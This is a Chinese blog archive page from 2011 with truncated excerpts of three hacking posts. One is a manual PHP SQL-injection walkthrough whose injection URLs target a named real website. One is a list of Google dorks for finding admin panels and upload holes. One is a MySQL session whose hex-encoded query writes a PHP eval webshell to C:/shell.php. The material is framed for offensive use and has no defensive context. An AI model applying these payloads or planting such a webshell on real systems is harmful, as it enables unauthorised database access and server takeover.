2011 年 5月 9 日随笔档案 - =_=!

高级PHP手工注入

摘要： 1.判断版本http://www.7747.net/document/advisory/detail.php?id=7and ord(mid(version(),1,1))>51 返回正常，说明大于4.0版本，支持ounion查询2.猜解字段数目,用order by也可以猜，也可以用union select一个一个的猜解http://www.7747.net/document/advisory/detail.php?id=7and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户，http://www.7747.net/document 阅读全文

posted @ 2011-05-09 01:05 =_=! 阅读(466) 评论(0) 推荐(0) 编辑

google hack之精简部分

摘要：察看基本情况：info:xx.com 返回一些基本信息site:xx.com 返回所有与该有关的urllink:xx.com 返回所有与该站做了连接的站site:xx.com filetype:txt 查找TXT文件其他的依次内推查找后台site:xx.com intext:管理site:xx.com inurl:loginsite:xx.com intitle:后台查看服务器使用的程序site:xx.com filetype:aspsite:xx.com filetype:phpsite:xx.com filetype:jspsite:xx.com filetype:aspx查看上传漏洞：阅读全文

posted @ 2011-05-09 00:59 =_=! 阅读(173) 评论(0) 推荐(0) 编辑

mysql多语句写shell

摘要： mysql> use xssdb;Database changedmysql> set @a=0x73656C656374203078334333463730363837303230343036353736363136433238323435463530344635333534354232373633364436343237354432393342334633452066726F6D20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;Query OK, 0 rows aff 阅读全文

posted @ 2011-05-09 00:21 =_=! 阅读(269) 评论(0) 推荐(0) 编辑

天黑再动手

高级PHP手工注入

google hack之精简部分

mysql多语句写shell

导航

公告